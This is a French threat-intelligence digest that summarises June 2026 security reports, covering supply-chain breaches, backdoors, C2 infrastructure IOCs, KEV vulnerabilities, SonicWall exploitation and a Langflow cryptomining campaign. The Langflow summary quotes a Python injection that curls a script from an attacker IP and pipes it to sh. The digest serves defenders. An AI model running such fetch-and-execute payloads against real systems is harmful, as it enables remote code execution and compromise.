Bienvenue sur Cyberveille

🗓️ Contexte Source : CybersecurityNews — publié le 22 juin 2026. Cet article rapporte une attaque de type supply chain ciblant la plateforme de market intelligence Klue, ayant conduit à l’exfiltration de données CRM Salesforce chez au moins neuf organisations clientes. 🔓 Vecteur d’accès initial L’attaque a débuté les 11 et 12 juin 2026 via l’utilisation d’un credential legacy compromis associé à un compte de service d’intégration. Les attaquants ont ensuite poussé une mise à jour de code malveillante afin de collecter des tokens OAuth, permettant l’accès aux plateformes tierces connectées à Klue. ...

🔍 Contexte Source : Hackread.com, publié le 23 juin 2026. LastPass a confirmé avoir été affecté par un incident de supply chain impliquant Klue, une plateforme de market intelligence utilisée par ses équipes go-to-market. 🎯 Nature de l’attaque Un acteur malveillant non autorisé a exploité des tokens OAuth volés depuis la plateforme Klue pour accéder à l’environnement Salesforce de LastPass. Le groupe responsable, nommé Icarus, est décrit comme un nouveau groupe d’extorsion. Il a : ...

🔍 Contexte Rapport publié le 24 juin 2026 par la Threat Hunter Team de Symantec (Broadcom). L’article documente un nouveau backdoor baptisé Backdoor.Mistic, actif depuis avril 2026, et son association probable avec l’initial access broker (IAB) suivi sous les noms Woodgnat (Symantec) et KongTuke (public). Le backdoor a également été documenté par Zscaler sous le nom MLTBackdoor. 🎯 Ciblage Le ciblage est opportuniste, couvrant plusieurs secteurs : Assurance Éducation IT Services professionnels D’autres activités liées à ModeloRAT et Node.js ont été observées dès février 2026 dans d’autres organisations, sans déploiement de Mistic. ...

🔍 Contexte Publié le 23 juin 2026 par SicuraNext (blog.sicuranext.com), cet article présente une recherche read-only menée le 11 juin 2026 sur une campagne active exploitant CVE-2026-26980, une injection SQL dans l’API publique Content de Ghost CMS (versions 3.24.0 à 6.19.0, corrigée en 6.19.1 en février 2026). ⚙️ Mécanisme d’attaque L’exploitation se déroule en deux étapes : Lecture via Content API (sans authentification) pour extraire la clé Admin API stockée en base de données Écriture via Admin API avec la clé volée pour injecter un loader JavaScript malveillant dans les corps de posts Le loader injecté (ghost_once_footer_<id>) utilise une porte localStorage (exécution unique par navigateur), encode l’origine victime via btoa(location.origin), et charge un second stage depuis un C2 via une URL base64 encodée. La chaîne mène à une page FakeCAPTCHA/ClickFix incitant les visiteurs à exécuter des commandes ou installer un malware. ...

🌍 Contexte Publié le 24 juin 2026 par Hunt.io sur son blog de recherche, cet article présente les résultats d’une cartographie systématique de l’infrastructure malveillante en Europe de l’Est, couvrant 10 pays (Biélorussie, Bulgarie, République tchèque, Hongrie, Pologne, Moldavie, Roumanie, Russie, Slovaquie, Ukraine) sur une fenêtre de trois mois (12 mars – 12 juin 2026). 📊 Chiffres clés 4 331 détections malveillantes totales chez 302 fournisseurs distincts 3 923 serveurs C2 (~90,6% des détections) 146 posts IOC Hunter, 111 répertoires ouverts malveillants, 90 sites de phishing, 61 IOCs publics Friendhosting LTD (Bulgarie) : 2 100 serveurs C2, soit 53,5% de toute l’infrastructure C2 régionale Top 5 fournisseurs : Friendhosting (BG, 2100), TimeWeb (RU, 277), PQ Hosting (MD, 175), Neterra (BG, 137), AlexHost (MD, 120) 🦠 Distribution des familles de malwares Keitaro : 1 277 IPs C2 uniques (TDS abusé pour malvertising/phishing) Tactical RMM : 232 C2s (outil légitime détourné) Acunetix : 173 C2s (infrastructure de reconnaissance) Gophish : 122 C2s Hajime : 106, Mozi : 82 (botnets IoT) Cobalt Strike : 35 vérifiés + 44 non vérifiés Sliver : 35 🎯 Acteurs de menace et campagnes identifiés Cloud Atlas APT : IP 146.70.53[.]171 (M247, AS9009, Bulgarie) et plusieurs IPs sur Baxet (AS51659) — ciblage d’entités gouvernementales/diplomatiques en Russie et Biélorussie, exploitation de CVE-2018-0802, phishing ZIP avec LNK/PowerShell INJ3CTOR3 : IP 146.70.129[.]114 (AS9009, République tchèque) — campagne de fraude téléphonique FreePBX, dropper Bash multi-étapes, webshell JOMANGY, outil ZenharR JINX-0164 : IP 89.36.224[.]5 (AS9009, Roumanie) — package npm malveillant @velora-dex/sdk v9.4.1, RAT Go minirat, ciblage développeurs macOS DeFi/Web3 ShinyHunters : IP 176.120.22[.]24 (Proton66 OOO, AS198953, Russie) — exploitation de CVE-2026-35273 (RCE Oracle PeopleSoft 8.61/8.62), ~300 instances ciblées dans 100+ organisations dont universités Nemesys ransomware : IP 141.98.83[.]86 (FlyServers, AS209588) — Mimikatz, LaZagne, outils NirSoft, persistance via clé Run HKCU Ollama Honeypot / CVE-2026-7482 : IP 78.85.31[.]182 (Rostelecom, AS12389) — coinminer, LLMjacking WantToCry ransomware : IP 87.225.105[.]217 (Rostelecom, AS12389) Fluffy Wolf : IP 195.2.67[.]129 (VDSina, AS48282) — phishing ciblant des organisations russes Black Basta : IP 109.172.88[.]38 (VDSina, AS48282) — vishing Teams, spam de registration-bombing, installation AnyDesk Gremlin Stealer (variant évolué) : IP 194.87.92[.]109 (MTW/JSC Mediasoft, AS48347) — exfiltration, payload XOR dans ressource .NET Pink Extortion Group : IP 185.178.208[.]153 (DDoS-Guard, AS57724) — vol de données Microsoft 365, exfiltration via Microsoft Graph API Silent Ransom Group (SRG) : IP 130.204.1[.]83 (A1 Bulgaria) — infrastructure DNS fast-flux DevilNFC (Android) : IP 185.203.116[.]18 (Belcloud) XenoRAT / Gentlemen Ransomware : IP 92.39.211[.]142 (MTS) Pioneer Kitten (probable) : IP 83.168.110[.]191 (SkyPass Solutions) — exploitation CVE-2026-0257 (Palo Alto GlobalProtect bypass) ProxyCB botnet / TeamSpy : IP 195.62.53[.]253 (IPServer) 🗺️ Répartition géographique des C2 Russie : 929 IPs uniques (45,7%) Pologne : 438 IPs (21,5%) — dispersées sur de nombreux petits fournisseurs Bulgarie : 298 IPs (14,7%) Roumanie : 199 IPs (9,8%) Ukraine : 170 IPs (8,4%) 📋 Type d’article Publication de recherche CTI à visée analytique, présentant une cartographie systématique de l’infrastructure malveillante régionale via la plateforme Host Radar de Hunt.io, avec des requêtes HuntSQL reproductibles et des exemples d’acteurs actifs. ...

📅 Source et contexte : Rapport de threat intelligence publié le 25 juin 2026 par DomainTools Intelligence (DTI), couvrant les opérations cyber étatiques et para-étatiques ciblant les systèmes d’eau et d’assainissement entre 2024 et 2026. 🎯 Contexte stratégique : Les systèmes d’eau et d’assainissement sont devenus des cibles privilégiées de la guerre hybride en raison de leur sous-investissement chronique en cybersécurité OT, de l’exposition internet de leurs PLCs et HMIs, et de leur valeur psychologique et politique disproportionnée. Les trois acteurs étatiques majeurs (Iran, Russie, Chine) convergent vers la même doctrine : utiliser ces infrastructures civiles comme leviers de pression sans franchir le seuil du conflit ouvert. ...

🛡️ Contexte Le 24 juin 2026, la CISA (Cybersecurity and Infrastructure Security Agency) a publié une alerte via sa directive BOD 26-04, signalant l’exploitation active de quatre vulnérabilités affectant des équipements réseau largement déployés. Les agences fédérales américaines disposent de trois jours pour appliquer les correctifs ou les mitigations recommandées. 🔴 Vulnérabilités Ubiquiti UniFi OS Trois CVE ont été ajoutées au catalogue KEV pour les équipements Ubiquiti UniFi OS : CVE-2026-34908 : Contournement de contrôle d’accès permettant à un attaquant non authentifié d’effectuer des modifications non autorisées, pouvant mener à une compromission totale du système. CVE-2026-34909 : Traversée de répertoire (path traversal) permettant l’accès à des fichiers sensibles (configurations, credentials), facilitant une prise de contrôle de compte. CVE-2026-34910 : Validation d’entrée incorrecte permettant l’injection et l’exécution de commandes OS arbitraires, pouvant conduire à une exécution de code à distance (RCE). Ubiquiti a publié des correctifs en mai 2026. Les chercheurs de Bishop Fox ont démontré que ces trois failles peuvent être chaînées pour obtenir un RCE complet avec privilèges élevés. Bishop Fox a également publié un script de détection gratuit sur GitHub. ...

🔍 Contexte Analyse publiée le 23 juin 2026 par Manuel Humberto Santander Peláez (SANS Internet Storm Center), portant sur deux années d’exploitation active de CVE-2024-40766, une vulnérabilité d’accès non autorisé (CVSS 9.3) dans SonicOS affectant les pare-feux Gen 5, Gen 6 et Gen 7 de SonicWall. 🎯 Vulnérabilités concernées CVE-2024-40766 : Improper access control dans SonicOS, affectant l’interface de gestion et le service SSLVPN. Advisory SNWLID-2024-0015 publié en août 2024. CVE-2024-12802 : Bypass d’authentification MFA sur SSLVPN SonicWall, exploité in-the-wild dès février-mars 2026. Sur Gen 6, le patch firmware seul ne remédie pas la faille — 6 étapes manuelles de reconfiguration LDAP sont requises. Les Gen 6 ont atteint leur end-of-life le 16 avril 2026, sans plus aucun patch de sécurité disponible. 👥 Acteurs de la menace Akira ransomware : exploitation documentée depuis septembre 2024, représentant 75% des intrusions. Dwell time documenté sous 4 heures, certains cas en 55 minutes. Fog ransomware : exploitation parallèle, représentant ~25% des intrusions sur la même période. En octobre 2025, Huntress a documenté plus de 100 comptes SSLVPN compromis dans 16 environnements clients en une seule vague, via des credentials valides (pas de brute-force). 🔓 Vecteurs d’exploitation post-patch Comptes locaux obsolètes : 12/14 pare-feux audités avaient des comptes SSLVPN sans équivalent Active Directory, dont certains avec des caractères non imprimables (indicateur de création automatisée par tooling d’exploitation). Absence de rotation des mots de passe : 11/14 pare-feux n’avaient pas changé les credentials locaux après la mise à jour firmware. LDAP Default User Group mal configuré : 9/14 pare-feux accordaient implicitement l’accès SSLVPN à tous les comptes AD authentifiés via LDAP. Dans un cas, ce groupe donnait aussi l’accès administrateur à l’interface de gestion. Virtual Office Portal exposé : 7/14 pare-feux avaient le portail d’enrollment MFA/TOTP accessible depuis Internet, permettant à un attaquant d’enrôler son propre dispositif TOTP avec des credentials valides. Breach MySonicWall (septembre 2025) : SonicWall a confirmé une compromission de sa plateforme cloud avec accès aux fichiers de sauvegarde de configuration contenant des credentials chiffrés — initialement annoncé comme <5% des clients, puis confirmé comme affectant la totalité des backups. 📊 Indicateurs de sessions suspectes Sessions depuis des ASN d’hébergeurs/VPS durant les heures creuses, durées de 40 à 60 heures Sessions sur des comptes locaux désactivés dans AD depuis plus d’un an, restant actives après le patch Type de session sess="CLI" dans les logs d’authentification SonicWall : indicateur d’outillage automatisé (documenté par ReliaQuest en mai 2026) Transition sess="CLI" → sess="GMS" : signal fort d’une activité hands-on-keyboard après credential testing automatisé 🧩 Type d’article Analyse technique post-mortem combinant retour d’audit terrain (14 pare-feux), chronologie d’exploitation sur deux ans, et extraction de règles de détection. But principal : documenter l’écart entre un pare-feu « patché » et un pare-feu réellement durci. ...

🗓️ Contexte Publié le 24 juin 2026 par Dataminr (auteur : Joseph Slowik, Director of Threat Research and Cyber Engineering), cet article analyse l’ajout de CVE-2025-67038 au catalogue KEV (Known Exploited Vulnerabilities) de la CISA le 23 juin 2026, aux côtés de trois vulnérabilités affectant la plateforme Ubiquiti. 🔍 Vulnérabilité concernée CVE-2025-67038 : vulnérabilité d’injection de code / exécution de commandes arbitraires dans la plateforme Lantronix EDS5000 Le Lantronix EDS5000 est un convertisseur série-ethernet utilisé dans l’automatisation industrielle et les environnements OT/IoT Ces dispositifs constituent des points de passage critiques (choke points) pour les opérations cyber-physiques L’ajout au KEV confirme une exploitation active documentée ⚠️ Implications opérationnelles Exploitation possible entraînant une perte ou un déni de contrôle sur des équipements industriels ou d’automatisation en aval Les environnements industriels à haute disponibilité ne peuvent généralement pas appliquer des correctifs hors fenêtre de maintenance planifiée Des mesures compensatoires sont nécessaires dans l’immédiat 🏴‍☠️ Précédents d’acteurs étatiques 2015 – Ukraine : Sandworm (GRU russe) a attaqué des sous-stations de distribution électrique, développant un payload de firmware malveillant pour « bricker » des convertisseurs série-ethernet, induisant une perte de contrôle et compliquant la restauration ~2025 – Pologne : Berserk Bear (FSB russe) a exploité des identifiants par défaut sur des convertisseurs série-ethernet dans des entités industrielles polonaises pour les réinitialiser en paramètres d’usine, modifier les identifiants et les adresses IP, rendant les équipements inaccessibles 📌 Type d’article Analyse de menace à visée opérationnelle, destinée aux équipes de sécurité industrielle et OT, visant à contextualiser l’ajout au KEV CISA et à évaluer le niveau de risque cyber-physique associé à CVE-2025-67038. ...

🔍 Contexte Publié le 23 juin 2026 par Trend Micro (Simon Dulude et John Zhang), cet article présente une analyse technique complète d’une campagne de cryptominage exploitant CVE-2026-33017, une vulnérabilité d’exécution de code à distance non authentifiée dans Langflow, un framework Python de construction de workflows LLM. 🎯 Vecteur d’accès initial L’exploitation cible l’endpoint POST /api/v1/build_public_tmp/{flow_id}/flow de Langflow, qui évalue du code Python sans authentification. L’attaquant injecte __import__('os').system('curl http://83.142.209.214:8080/isp.sh | sh') pour déclencher la chaîne d’infection. Le même flow_id UUID (0ee284cc-0eb1-493f-bc60-94fa8d1cfd18) est réutilisé dans toutes les tentatives. La fenêtre d’observation couvre 19 jours (27 mars – 15 avril 2026). ...